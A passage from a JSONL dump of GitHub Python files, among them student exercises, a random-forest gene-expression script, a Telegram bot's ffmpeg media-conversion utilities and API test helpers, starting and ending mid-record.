\"{}?token={}&url=0\"\n\n @classmethod\n def fetch_html(cls, token: str, url: str, js_rendering: Optional[bool] = False) -> str:\n try:\n if js_rendering is True:\n query = cls.__query_template.format(cls.__api_base_url, token, url, \"true\")\n else:\n query = cls.__query_template.format(cls.__api_base_url, token, url, \"false\")\n\n page = requests.get(query)\n html = page.text\n return html\n\n except Exception as e:\n raise e\n\n @classmethod\n def fetch_credit_usage_info(cls, token: str):\n try:\n url = cls.__credit_usage_template.format(cls.__api_base_url, token)\n res = requests.get(url)\n headers = res.headers\n\n return headers['X-Credits-Remaining']\n\n except Exception as e:\n raise e\n","repo_name":"AlexQ0807/proxyscraperservicewrapper","sub_path":"proxyscraperservicewrapper/services/scraperboxservice.py","file_name":"scraperboxservice.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9919402760","text":"\"\"\"calculate whether or not a string is a palindrome using recursion\"\"\"\r\n\"\"\"Brandon Pickup\"\"\"\r\n\"\"\"3 May 2014\"\"\"\r\n\"\"\"Assignment 8 Question 1\"\"\"\r\nsent = input(\"Enter a string:\\n\")\r\ndef palindrome(s):\r\n if len(s)<=1:\r\n return \"Palindrome!\"\r\n elif s[0] == s[-1]:#checks to see whether the first and last letters are the same\r\n return palindrome(s[1:len(s)-1])#runs the function again on a string with either edge truncated\r\n else:\r\n return \"Not a
palindrome!\"\r\nprint(palindrome(sent))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/pckbra002/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42903542535","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\npd.options.display.width = 0\n\nfeat_imp_scores, species, feat_names = [], [], []\nscores = []\n\nfor cls_task in ['Low-medium-High', 'Low-High']:\n mapped_read_counts = ['arabidopsis_counts.csv', 'zea_counts.csv', 'solanum_counts.csv', 'sbicolor_counts.csv']\n generic_feats = ['Arabidopsis_generated_features.csv', 'Zea_generated_features.csv',\n 'Solanum_generated_features.csv', 'Sorghum_generated_features.csv']\n\n for idx in range(4):\n tpm = pd.read_csv(f'tpm_counts/{mapped_read_counts[idx]}')\n predictors = pd.read_csv(generic_feats[idx], index_col=0)\n targets = []\n for log_count in tpm['logMaxTPM']:\n if log_count <= np.percentile(tpm['logMaxTPM'], 25):\n targets.append(0)\n elif log_count >= np.percentile(tpm['logMaxTPM'], 75):\n targets.append(1)\n else:\n targets.append(2)\n tpm['label'] = targets\n tpm = tpm[['gene_id', 'label']]\n data = predictors.merge(tpm, how='inner', on='gene_id')\n if cls_task == 'Low-High':\n data = data[data['label'] != 2]\n print(data.head())\n\n for chrom in data['Chromosome'].unique():\n data_train = data.copy()\n data_train = data_train[data_train['Chromosome'] != chrom]\n data_train.drop(columns=['gene_id', 'Chromosome'], inplace=True)\n data_test = data.copy()\n data_test = data_test[data_test['Chromosome'] == chrom]\n data_test.drop(columns=['gene_id', 'Chromosome'], inplace=True)\n\n # Balance data and standardizing\n sampler = RandomOverSampler(random_state=42)\n x_train, y_train = data_train.values[:, :-1], data_train['label'].values\n x_train, y_train = sampler.fit_resample(x_train, y_train)\n x_test, y_test = data_test.values[:, :-1], data_test['label'].values\n scaler = StandardScaler()\n scaler.fit(x_train)\n x_train_std = scaler.transform(x_train)\n x_test_std = scaler.transform(x_test)\n random_forest = RandomForestClassifier(100)\n random_forest.fit(x_train_std, y_train)\n if cls_task == 'Low-High':\n feat_imp = random_forest.feature_importances_\n feat_imp_scores.extend(feat_imp)\n feat_names.extend(data_train.columns[:-1])\n species.extend([generic_feats[idx].split('_')[0]] * len(data_train.columns[:-1]))\n y_pred = random_forest.predict(x_test_std)\n acc = accuracy_score(y_test, y_pred)\n scores.append([generic_feats[idx].split('_')[0], acc, cls_task])\n print(generic_feats[idx].split('_')[0], random_forest.score(x_test_std, y_test), cls_task)\n\ndf_feat_imp = pd.DataFrame({'Importance scores': feat_imp_scores,\n 'Species': species,\n 'Feature': feat_names})\ndf_feat_imp.sort_values(by='Species', inplace=True)\ndf_performance = pd.DataFrame(scores, columns=['Species', 'accuracy',\n 'task']).to_csv('../results/rand_for_perf.csv', index=False)\ndf_feat_imp.to_csv('../results/rand_for_feat_imp_SSR.csv', index=False)\n","repo_name":"NAMlab/DeepCRE","sub_path":"model/random_forest_ssr.py","file_name":"random_forest_ssr.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} 
+{"seq_id":"9924500310","text":"'''program to check if a complete Sudoku grid is valid or not.\nDaniel M. Tamale\nTMLDAN001\n2014-05-16'''\n\n'''i and j are Sudoku rows and columns respectively''' \nstep=[]\nfor i in range(9):\n step.append([])\n list=input('')\n for j in range(9):\n step[-1].append(int(list[j:j+1]))\n\n'''Boolean value for validity of grid''' \nvalid=True\nfor i in range(9):\n grid=[0]*9\n for j in range(9):\n grid[step[i][j]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n \nfor j in range(9):\n grid=[0]*9\n for i in range(9):\n grid[step[i][j]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n\n'''variables row and col for larger Sudoku rows and columns respectively''' \nfor row in range(0,9,3):\n for col in range(0,9,3):\n grid=[0]*9\n for i in range(3):\n for j in range(3):\n grid[step[i+row][j+col]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n \nif valid:\n print('Sudoku grid is valid')\nelse:\n print('Sudoku grid is not valid')","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/tmldan001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70151987640","text":"def get_readable_time_from_seconds(seconds: int, granularity=2) -> str:\n intervals = (\n ('months', 2628000),\n ('days', 86400),\n ('hours', 3600),\n ('minutes', 60),\n ('seconds', 1),\n )\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(f\"{value} {name}\")\n return ', '.join(result[:granularity])\n\n\ndef get_percentage_from_float(value: float) -> str:\n return '{0:.2f} %'.format(value)\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/utils/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34662124975","text":"\"\"\"\n@Description:\n@Time: 2022/6/25 21:07\n\"\"\"\nimport json\nimport logging\nimport os\n\nimport requests\nimport yaml\nfrom requests import Response\n\nfrom constants import ROOT_PATH\nfrom utils_hep import lower_dict_keys\n\nlog = logging.getLogger(__name__)\n\nclass BaseApi:\n env = yaml.safe_load(open(os.path.join(ROOT_PATH, r'config/env.yaml')))\n\n def __init__(self):\n self.url = None\n self.method = None\n self.params = None\n self.headers = None\n\n def send(self):\n data = {\n \"url\": self.url,\n \"method\": self.method,\n \"params\": self.params,\n \"headers\": self.headers\n }\n data[\"url\"] = str(data[\"url\"]).replace(\"env_path\", self.env[self.env[\"default\"]])\n r = requests.request(method=data['method'],\n url=data['url'],\n headers=data['headers'])\n # print log\n get_req_resp_record(r)\n return r\n\n\ndef get_req_resp_record(resp_obj: Response):\n \"\"\" get request and response info from Response() object.\n \"\"\"\n\n def log_print(req_or_resp, r_type):\n msg = f\"\\n================== {r_type} details ==================\\n\"\n for key, value in req_or_resp.items():\n if isinstance(value, dict) or isinstance(value, list):\n value = json.dumps(value, indent=4, ensure_ascii=False)\n\n msg += \"{:<8} : {}\\n\".format(key, value)\n log.info(msg)\n\n request_headers = dict(resp_obj.request.headers)\n request_body = resp_obj.request.body\n\n if request_body is not None:\n try:\n request_body = 
json.loads(request_body)\n except json.JSONDecodeError:\n # str: a=1 & b=2\n pass\n except UnicodeDecodeError:\n # bytes/bytesarray: request body in protobuf\n pass\n except TypeError:\n # neither str or bytes/bytearray, eg. <MultipartEncoder>\n pass\n\n request_content_type = lower_dict_keys(request_headers).get(\"content-type\")\n if request_content_type and \"multipart/form-data\" in request_content_type:\n request_body = \"upload file stream (OMITTED)\"\n\n request_data = {\n \"method\": resp_obj.request.method,\n \"url\": resp_obj.request.url,\n \"headers\": request_headers,\n \"body\": request_body\n }\n\n log_print(request_data, \"request\")\n\n resp_headers = dict(resp_obj.headers)\n lower_resp_headers = lower_dict_keys(resp_headers)\n content_type = lower_resp_headers.get(\"content-type\", \"\")\n\n if \"image\" in content_type:\n # response is image type, record bytes content only\n response_body = resp_obj.content\n else:\n try:\n response_body = resp_obj.json()\n except ValueError:\n resp_text = resp_obj.text\n response_body = resp_text\n\n response_data = {\n \"status_code\": resp_obj.status_code,\n \"cookies\": resp_obj.cookies or {},\n \"encoding\": resp_obj.encoding,\n \"headers\": resp_headers,\n \"content_type\": content_type,\n \"body\": response_body\n }\n\n log_print(response_data, \"response\")","repo_name":"SanyaSS-beep/api_automation_wecom","sub_path":"api/base_api.py","file_name":"base_api.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70126546680","text":"from aoc_logging import logger\n\ndef part_one():\n print(\"--- Part One ---\")\n\n n_trees = 0\n\n x = 0\n\n width = None\n with open(\"map.txt\", 'r') as f:\n for line in f:\n line = line.strip()\n\n if width is None:\n width = len(line)\n else:\n if line[x] == \"#\":\n n_trees += 1\n\n x = (x+3) % width\n\n print(f\"I will encounter {n_trees} trees\")\n\n\ndef part_two():\n print(\"--- Part Two ---\")\n\n slopes = [\n [1, 1],\n [3, 1],\n [5, 1],\n [7, 1],\n [1, 2]\n ]\n\n n_trees = [0 for _ in slopes]\n\n xs = [0 for _ in slopes]\n\n width = None\n with open(\"map.txt\", 'r') as f:\n for i, line in enumerate(f):\n line = line.strip()\n\n for i_slope, (slope, x) in enumerate(zip(slopes, xs)):\n if width is None:\n width = len(line)\n if i % slope[1] == 0:\n if line[x] == \"#\":\n n_trees[i_slope] += 1\n\n xs[i_slope] = (x+slope[0]) % width\n\n print(n_trees)\n answer = 1\n for n in n_trees:\n answer *= n\n print(f\"Answer: {answer}\")\n\n\nif __name__ == '__main__':\n print(\"--- Day 3: Toboggan Trajectory ---\")\n part_one()\n part_two()","repo_name":"Yi-Jiahe/advent-of-code-2020","sub_path":"Day 3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21802259869","text":"import os\nimport logging\nimport subprocess\nimport requests\n\nimport ffmpy\n\nfrom pathlib import Path\n\nfrom moviepy.editor import *\n\nimport music_tag\nfrom telegram import ReplyKeyboardMarkup\nfrom telegram.ext import CallbackContext\n\nfrom models.admin import Admin\nfrom models.user import User\nfrom localization import keys\n\nlogger = logging.getLogger()\n\ndef translate_key_to(key: str, destination_lang: str) -> str:\n \"\"\"Find the specified key in the `keys` dictionary and returns the corresponding\n value for the given language\n\n **Keyword arguments:**\n - file_path (str) -- The file path 
of the file to delete\n\n **Returns:**\n - The value of the requested key in the dictionary\n \"\"\"\n if key not in keys:\n raise KeyError(\"Specified key doesn't exist\")\n\n return keys[key][destination_lang]\n\n\ndef delete_file(file_path: str) -> None:\n \"\"\"Deletes a file from the filesystem. Simply ignores the files that don't exist.\n\n **Keyword arguments:**\n - file_path (str) -- The file path of the file to delete\n \"\"\"\n if os.path.exists(file_path):\n os.remove(file_path)\n\n\ndef generate_music_info(tag_editor_context: dict) -> str:\n \"\"\"Generate the details of the music based on the values in `tag_editor_context`\n dictionary\n\n **Keyword arguments:**\n - tag_editor_context (dict) -- The context object of the user\n\n **Returns:**\n `str`\n \"\"\"\n ctx = tag_editor_context\n\n return (\n f\"*🗣 Artist:* {ctx['artist'] if ctx['artist'] else '-'}\\n\"\n f\"*🎵 Title:* {ctx['title'] if ctx['title'] else '-'}\\n\"\n f\"*🎼 Album:* {ctx['album'] if ctx['album'] else '-'}\\n\"\n f\"*🎹 Genre:* {ctx['genre'] if ctx['genre'] else '-'}\\n\"\n f\"*📅 Year:* {ctx['year'] if ctx['year'] else '-'}\\n\"\n f\"*💿 Disk Number:* {ctx['disknumber'] if ctx['disknumber'] else '-'}\\n\"\n f\"*▶️ Track Number:* {ctx['tracknumber'] if ctx['tracknumber'] else '-'}\\n\"\n \"{}\\n\"\n )\n\n\ndef increment_usage_counter_for_user(user_id: int) -> int:\n \"\"\"Increment the `number_of_files_sent` column of user with the specified `user_id`.\n\n **Keyword arguments:**\n - user_id (int) -- The user id of the user\n\n **Returns:**\n The new value for `user.number_of_files_sent`\n \"\"\"\n user = User.where('user_id', '=', user_id).first()\n\n if user:\n user.number_of_files_sent = user.number_of_files_sent + 1\n user.push()\n\n return user.number_of_files_sent\n\n raise LookupError(f'User with id {user_id} not found.')\n\ndef reset_user_data_context(context: CallbackContext) -> None:\n user_data = context.user_data\n language = user_data['language'] if ('language' in user_data) else 'en'\n\n if 'voice_path' in user_data:\n delete_file(user_data['voice_path'])\n if 'voice_art_path' in user_data:\n delete_file(user_data['voice_art_path'])\n if 'new_voice_art_path' in user_data:\n delete_file(user_data['new_voice_art_path'])\n if 'music_path' in user_data:\n delete_file(user_data['music_path'])\n if 'art_path' in user_data:\n delete_file(user_data['art_path'])\n if 'new_art_path' in user_data:\n delete_file(user_data['new_art_path'])\n if 'video_path' in user_data:\n delete_file(user_data['video_path'])\n if 'video_art_path' in user_data:\n delete_file(user_data['video_art_path'])\n if 'new_video_art_path' in user_data:\n delete_file(user_data['new_video_art_path'])\n if 'gif' in user_data:\n delete_file(user_data['gif'])\n\n new_user_data = {\n 'convert_video_to_gif': False,\n 'convert_video_to_circle': False,\n 'voice_path': '',\n 'voice_art_path': '',\n 'new_voice_art_path': '',\n 'video_path': '',\n 'video_art_path': '',\n 'new_video_art_path': '',\n 'gif': '',\n 'video_message_id': '',\n 'video_duration': '',\n 'tag_editor': {},\n 'music_path': '',\n 'music_duration': 0,\n 'art_path': '',\n 'new_art_path': '',\n 'current_active_module': '',\n 'music_message_id': 0,\n 'language': language,\n }\n context.user_data.update(new_user_data)\n\ndef create_user_directory(user_id: int) -> str:\n \"\"\"Create a directory for a user with a given id.\n\n **Keyword arguments:**\n - user_id (int) -- The user id of the user\n\n **Returns:**\n The path of the created directory\n \"\"\"\n user_download_dir = 
f\"downloads/{user_id}\"\n\n try:\n Path(user_download_dir).mkdir(parents=True, exist_ok=True)\n except (OSError, FileNotFoundError, BaseException) as error:\n raise Exception(f\"Can't create directory for user_id: {user_id}\") from error\n\n return user_download_dir\n\ndef download_file(user_id: int, file_to_download, file_type: str, context: CallbackContext) -> str:\n \"\"\"Download a file using convenience methods of \"python-telegram-bot\"\n\n **Keyword arguments:**\n - user_id (int) -- The user's id\n - file_to_download (*) -- The file object to download\n - file_type (str) -- The type of the file, either 'photo' or 'audio'\n - context (CallbackContext) -- The context object of the user\n\n **Returns:**\n The path of the downloaded file\n \"\"\"\n user_download_dir = f\"downloads/{user_id}\"\n file_id = ''\n file_extension = ''\n\n if file_type == 'audio':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_name = file_to_download.file_name\n file_extension = file_name.split(\".\")[-1]\n elif file_type == 'photo':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_extension = 'jpg'\n elif file_type == 'video':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_name = file_to_download.file_name\n file_extension = file_name.split(\".\")[-1]\n elif file_type == 'voice':\n file_id = context.bot.get_file(file_to_download.file_id)\n mime_type = file_to_download.mime_type\n file_extension = mime_type.split(\"/\")[-1]\n\n # voice_path = voice_path.split(\"/\")[-1]\n\n # mime_type = voice_path.split(\".\")[-1]\n # voice = voice_path.split(\".\")[0]\n\n # # logger.error(voice_path)\n # new_voice = ffmpegcommand(file_id.file_id, file_extension)\n # os.system(new_voice)\n\n # logger.error(new_voice)\n # logger.error(file_id.file_id)\n\n file_download_path = f\"{user_download_dir}/{file_id.file_id}.{file_extension}\"\n\n try:\n file_id.download(f\"{user_download_dir}/{file_id.file_id}.{file_extension}\")\n except ValueError as error:\n raise Exception(f\"Couldn't download the file with file_id: {file_id}\") from error\n\n return file_download_path\n\ndef generate_start_over_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `start_over_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [translate_key_to('BTN_NEW_FILE', language)],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\n\ndef generate_module_selector_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_TAG_EDITOR', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef generate_module_selector_video_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_video_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VIDEO_TO_CIRCLE', language),\n translate_key_to('BTN_CONVERT_VIDEO_TO_GIF', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef 
generate_module_selector_voice_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_video_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VOICE_TO_AUDIO', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef generate_tag_editor_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_ALBUM_ART', language)\n ],\n ],\n resize_keyboard=True,\n )\n )\n\ndef generate_tag_editor_video_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VIDEO_TO_CIRCLE', language),\n translate_key_to('BTN_CONVERT_VIDEO_TO_GIF', language),\n ],\n ],\n resize_keyboard=True,\n )\n )\n\ndef save_tags_to_file(file: str, tags: dict, new_art_path: str) -> str:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - file (str) -- The path of the file\n - tags (str) -- The dictionary containing the tags and their values\n - new_art_path (str) -- The new album art to set\n\n **Returns:**\n The path of the file\n \"\"\"\n music = music_tag.load_file(file)\n\n try:\n if new_art_path:\n with open(new_art_path, 'rb') as art:\n music['artwork'] = art.read()\n except OSError as error:\n raise Exception(\"Couldn't set hashtags\") from error\n\n music['artist'] = tags['artist'] if tags['artist'] else ''\n music['title'] = tags['title'] if tags['title'] else ''\n music['album'] = tags['album'] if tags['album'] else ''\n music['genre'] = tags['genre'] if tags['genre'] else ''\n music['year'] = int(tags['year']) if tags['year'] else 0\n music['disknumber'] = int(tags['disknumber']) if tags['disknumber'] else 0\n music['tracknumber'] = int(tags['tracknumber']) if tags['tracknumber'] else 0\n\n music.save()\n\n return file\n\ndef ffmpegcommand(voice, mime_type):\n # 1) wav to mp3\n # ffmpeg -i audio.wav -acodec libmp3lame audio.mp3\n\n # 2) ogg to mp3\n # ffmpeg -i audio.ogg -acodec libmp3lame audio.mp3\n\n # 3) ac3 to mp3\n # ffmpeg -i audio.ac3 -acodec libmp3lame audio.mp3\n\n # 4) aac to mp3\n # ffmpeg -i audio.aac -acodec libmp3lame audio.mp3\n\n new_mime_type = \"mp3\"\n # cmd = f'ffmpeg -i \"{voice}.{mime_type}\" -acodec libmp3lame \"{voice}.{new_mime_type}\"'\n # cmd = f'ffmpeg -i \"{inputt}\" -c copy \"{output}\"'\n cmd = f'ffmpeg -i \"{voice}.{mime_type}\" \"{voice}.{new_mime_type}\"'\n\n # ffmpeg -i input.mp3 -acodec libopus output.ogg -y\n # import os\n # import requests\n # import subprocess\n\n # token = YYYYYYY\n # chat_id = XXXXXXXX\n\n # upload_audio_url = \"https://api.telegram.org/bot%s/sendAudio?chat_id=%s\" % (token, chat_id)\n # audio_path_wav = '/Users/me/some-file.wav'\n\n # # Convert the file from wav to ogg\n # filename = os.path.splitext(audio_path_wav)[0]\n # audio_path_ogg = filename + '.ogg'\n # subprocess.run([\"ffmpeg\", '-i', audio_path_wav, '-acodec', 'libopus', 
audio_path_ogg, '-y'])\n\n # with open(audio_path_ogg, 'rb') as f:\n # data = f.read()\n\n # # An arbitrary .ogg filename has to be present so that the spectogram is shown\n # file = {'audio': ('Message.ogg', data)}\n # result = requests.post(upload_audio_url, files=file)\n # https://stackoverflow.com/questions/44615991/how-convert-ogg-file-to-telegram-voice-format\n # print(\"Command to be Executed is\")\n # print(cmd)\n return cmd\n\ndef myffmpegcommand(voice_path, user_data):\n voice = voice_path.split(\".\")[0]\n new_mime_type = \".mp3\"\n new_voice = voice + new_mime_type\n # subprocess.run([\"ffmpeg\", '-i', voice_path, '-acodec', 'libopus', new_voice, '-y'])\n # subprocess.run([\"ffmpeg -i {voice_path} -map 0:a -acodec libmp3lame {new_voice}\"])\n \n subprocess.run([\"ffmpeg\", \"-n\", \"-i\", voice_path, \"-acodec\", \"libmp3lame\", \"-ab\", \"128k\", new_voice])\n user_data['new_voice_art_path'] = new_voice\n # delete_file(user_data['voice_path'])\n # logging.info(user_data['new_voice_art_path'])\n # return\n # codec = \"libmp3lame\"\n # mp3_filename = filename + \".mp3\"\n\n # command = [self.FFMPEG_BIN,\n # \"-n\",\n # \"-i\", path,\n # \"-acodec\", codec,\n # \"-ab\", \"128k\",\n # mp3_filename\n # ]\n\n # old_voice = voice_path.split(\"/\")[-1]\n # voice_path = voice_path.split(\"/\")[0]\n # logger.error(voice_path)\n\n # mime_type = voice_path.split(\".\")[-1]\n # voice = voice_path.split(\".\")[0]\n\n\n\n # with open(new_voice, 'rb') as f:\n # data = f.read()\n\n # logging.error(new_voice)\n\n # An arbitrary .ogg filename has to be present so that the spectogram is shown\n # file = {'audio': ('Message.ogg', data)}\n # result = requests.post(upload_audio_url, files=file)\n # return result\n\ndef video_to_gif(video_path, user_data):\n video = video_path.split(\".\")[0]\n new_mime_type = \".gif\"\n gif = video + new_mime_type\n\n # logging.error(new_video)\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-pix_fmt\", \"rgb24\", gif])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-movflags\", \"faststart\", \"-pix_fmt\", \"yuv420p\", \"-vf\", \"scale=trunc(iw/2)*2:trunc(ih/2)*2\", gif])\n subprocess.run([\"ffmpeg\", \"-ss\", \"00:00:00.000\", \"-i\", video_path, \"-pix_fmt\", \"rgb24\", \"-r\", \"10\", \"-s\", \"320x240\", \"-t\", \"00:00:10.000\", gif])\n user_data['gif'] = gif\n\n\n # subprocess([\"ffmpeg -f gif -i \" {video_path outfile.mp4}])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-c:v\", \"libvpx\", \"-crf\", \"12\", \"-b:v\", \"500K\", gif])\n # subprocess.run([\"ffmpeg\", \"-f\", \"gif\", \"-i\", video_path, gif])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-movflags\", \"faststart\", \"-pix_fmt\", \"yuv420p\", \"-vf\", \"scale=trunc(iw/2)*2:trunc(ih/2)*2\", gif])\n # subprocess.run([\"ffmpeg\", \"-ss\", \"00:01:30\", \"-t\", \"5\", \"-i\", video_path, \"-filter_complex\", \"[0:v] fps=10,scale=720:-1 [new];[new][1:v] paletteuse\", gif])\n # subprocess.run([\"ffmpeg\", \"-stream_loop 5\", \"-i\", video_path, \"-y;ffmpeg\", \"-i\" loop.gif -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" loop.mp4 -y\"])\n # try:\n # with open(video_path, 'rb') as video_file:\n # clip = (VideoFileClip(video_file)\n # .subclip((1,22.65),(1,23.2))\n # .resize(0.3))\n # clip.write_gif(new_video)\n\n # except (BaseException) as error:\n # logger.exception(\"Telegram error: %s\", error)\n\n # subprocess.run([\"ffmpeg -ss 30 -t 3 -i\", video_path, \"-vf\", \"fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse\", \"-loop 
0\", new_video])\n # subprocess.run([\"ffmpeg -i\", video_path, \"-vf scale=320:-1 -r 10 -f image2pipe -vcodec ppm - | convert -delay 10 -loop 0 - gif:- | convert -layers Optimize - \", new_video])\n\n # subprocess.run([video_path, new_video])","repo_name":"ahmadkybora/bt_21","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5422042931","text":"import os\nimport time\nimport sys\nfrom xml.dom.minidom import Document\n\nfrom ovd.Config import Config\nfrom ovd.Exceptions import InterruptedException\nfrom ovd.Logger import Logger\nfrom ovd.Platform.System import System\n\nfrom Dialog import Dialog\nfrom SMRequestManager import SMRequestManager\n\n\nclass SlaveServer:\n\tdef __init__(self, CommunicationClass):\n\t\tLogger.debug(\"SlaveServer construct\")\n\t\t\n\t\tself.stopped = False\n\t\t\n\t\tself.role_dialogs = []\n\t\tself.monitoring = None\n\t\tself.time_last_send_monitoring = 0\n\t\t\n\t\tself.ulteo_system = False\n\t\tif os.path.isfile(\"/usr/bin/apt-get\"):\n\t\t\tself.ulteo_system = True\n\t\t\n\t\t\n\t\tself.dialog = Dialog(self)\n\t\tself.smRequestManager = SMRequestManager()\n\t\t\n\t\tself.communication = CommunicationClass()\n\t\tself.communication.dialogInterfaces.append(self.dialog)\n\t\n\t\n\tdef load_roles(self):\n\t\tfor role in Config.roles:\n\t\t\ttry:\n\t\t\t\tRole = __import__(\"ovd.Role.%s.Role\" %(role), {}, {}, \"Role\")\n\t\t\t\tRoleDialog = __import__(\"ovd.Role.%s.Dialog\"%(role), {}, {}, \"Dialog\")\n\t\t\t\tRoleConfig = __import__(\"ovd.Role.%s.Config\"%(role), {}, {}, \"Config\")\n\t\t\t\n\t\t\texcept ImportError:\n\t\t\t\tLogger.error(\"Unsupported role '%s'\"%(role))\n\t\t\t\timport traceback\n\t\t\t\tLogger.debug(traceback.format_exc())\n\t\t\t\treturn False\n\t\t\t\n\t\t\tif not RoleConfig.Config.init(Config.get_role_dict(role)):\n\t\t\t\tLogger.error(\"Unable to init configuration for role '%s'\"%(role))\n\t\t\t\treturn False\n\t\t\t\n\t\t\tRoleConfig.Config.general = Config\n\t\t\t\n\t\t\trole_instance = Role.Role(self)\n\t\t\tdialog_instance = RoleDialog.Dialog(role_instance)\n\t\t\t\n\t\t\tself.communication.dialogInterfaces.append(dialog_instance)\n\t\t\tself.role_dialogs.append((role_instance, dialog_instance))\n\t\t\n\t\treturn True\n\t\n\t\n\tdef init(self):\n\t\tLogger.debug(\"SlaveServer init\")\n\t\t\n\t\tif not self.communication.initialize():\n\t\t\treturn False\n\t\t\n\t\tself.communication.thread.start()\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\ttry:\n\t\t\t\tif not role.init():\n\t\t\t\t\traise Exception()\n\t\t\texcept InterruptedException:\n\t\t\t\treturn False\n\t\t\texcept Exception:\n\t\t\t\tLogger.exception(\"SlaveServer: unable to initialize role '%s'\"%role.getName())\n\t\t\t\treturn False\n\t\t\t\n\t\t\trole.thread.start()\n\t\t\n\t\t# Check each thread has started correctly (communication + roles)\n\t\tt0 = time.time()\n\t\twhile self.communication.getStatus() is not self.communication.STATUS_RUNNING:\n\t\t\tt1 = time.time()\n\t\t\t\n\t\t\tif (t1-t0 > 20) or (not self.communication.thread.isAlive()) or self.communication.getStatus() is self.communication.STATUS_ERROR:\n\t\t\t\tLogger.warn(\"SlaveServer::init communication thread error\")\n\t\t\t\treturn False\n\t\t\t\n\t\t\tLogger.info(\"Waiting for communication status running\")\n\t\t\ttime.sleep(1)\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\twhile role.getStatus() is not 
